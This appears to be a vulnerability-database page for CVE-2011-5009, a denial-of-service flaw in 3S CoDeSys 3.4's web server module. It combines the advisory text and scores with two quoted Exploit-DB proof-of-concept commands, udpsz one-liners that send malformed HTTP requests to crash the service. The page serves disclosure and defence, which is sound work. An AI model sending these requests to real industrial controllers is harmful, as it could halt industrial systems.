CVE-2011-5009
published 2011-12-25CVE-2011-5009: The CmpWebServer.dll module in the Control service in 3S CoDeSys 3.4 SP4 Patch 2 allows remote attackers to cause a denial of service (NULL pointer…
PriorityP429medium5CVSS 2.0
AVNACLAuNCNINAP
EXPLOIT
EPSS
10.78%
95.3th percentile
The CmpWebServer.dll module in the Control service in 3S CoDeSys 3.4 SP4 Patch 2 allows remote attackers to cause a denial of service (NULL pointer dereference) via (1) a crafted Content-Length in an HTTP POST or (2) an invalid HTTP request method.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| 3ssoftware | codesys | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
CISA ICS
3S CoDeSys Vulnerabilities
cisa_ics·2018-09-06·CVSS 10.0
[CRITICAL] 3S CoDeSys Vulnerabilities
## Archived Content In an effort to keep CISA.gov current, the archive contains outdated information that may not reflect current policy or programs.
ICS Advisory
##
3S CoDeSys Vulnerabilities
Last RevisedSeptember 06, 2018
Alert CodeICSA-12-006-01
## Overview
This advisory is a follow-up to the alert update, ICS-ALERT-11-336-01A 3S CoDeSys Vulnerabilities, which was released on the ICS-CERT Web page on December 02, 2011.
Security researcher Celil Unuver (SignalSec LLC) and independent researcher Luigi Auriemma have identified vulnerabilities in the 3S Smart Software Solutions CoDeSys product, summarized in the following table. Mr. Auriemma publicly disclosed the five vulnerabilities along with proof-of-concept (PoC) exploit code, including
GHSA
GHSA-8jmv-f4p4-24wg: The CmpWebServer
ghsa_unreviewed·2022-05-17
CVE-2011-5009 [MEDIUM] GHSA-8jmv-f4p4-24wg: The CmpWebServer
The CmpWebServer.dll module in the Control service in 3S CoDeSys 3.4 SP4 Patch 2 allows remote attackers to cause a denial of service (NULL pointer dereference) via (1) a crafted Content-Length in an HTTP POST or (2) an invalid HTTP request method.
No detection rules found.
Exploit-DB
CoDeSys 3.4 - Null Pointer Invalid HTTP Request Parsing Remote Denial of Service
exploitdb·2011-11-30
CVE-2011-5009 CoDeSys 3.4 - Null Pointer Invalid HTTP Request Parsing Remote Denial of Service
CoDeSys 3.4 - Null Pointer Invalid HTTP Request Parsing Remote Denial of Service
---
source: https://www.securityfocus.com/bid/50854/info
CoDeSys is prone to multiple denial-of-service vulnerabilities.
An attacker can exploit these issues to crash the application and deny service to legitimate users.
udpsz -T -c "BLAH / HTTP/1.0\r\n\r\n" SERVER 8080 -1
Exploit-DB
CoDeSys 3.4 - POST Null Pointer Content-Length Parsing Remote Denial of Service
exploitdb·2011-11-30
CVE-2011-5009 CoDeSys 3.4 - POST Null Pointer Content-Length Parsing Remote Denial of Service
CoDeSys 3.4 - POST Null Pointer Content-Length Parsing Remote Denial of Service
---
source: https://www.securityfocus.com/bid/50854/info
CoDeSys is prone to multiple denial-of-service vulnerabilities.
An attacker can exploit these issues to crash the application and deny service to legitimate users.
udpsz -T -c "POST / HTTP/1.0\r\nContent-Length: 4294967295\r\n\r\n" SERVER 8080 -1
No writeups or analysis indexed.
http://aluigi.altervista.org/adv/codesys_1-adv.txthttp://seclists.org/bugtraq/2011/Nov/178http://secunia.com/advisories/47018http://www.osvdb.org/77388http://www.osvdb.org/77389http://www.us-cert.gov/control_systems/pdf/ICS-ALERT-11-336-01A.pdfhttps://exchange.xforce.ibmcloud.com/vulnerabilities/71533http://aluigi.altervista.org/adv/codesys_1-adv.txthttp://seclists.org/bugtraq/2011/Nov/178http://secunia.com/advisories/47018http://www.osvdb.org/77388http://www.osvdb.org/77389http://www.us-cert.gov/control_systems/pdf/ICS-ALERT-11-336-01A.pdfhttps://exchange.xforce.ibmcloud.com/vulnerabilities/71533
2011-12-25
Published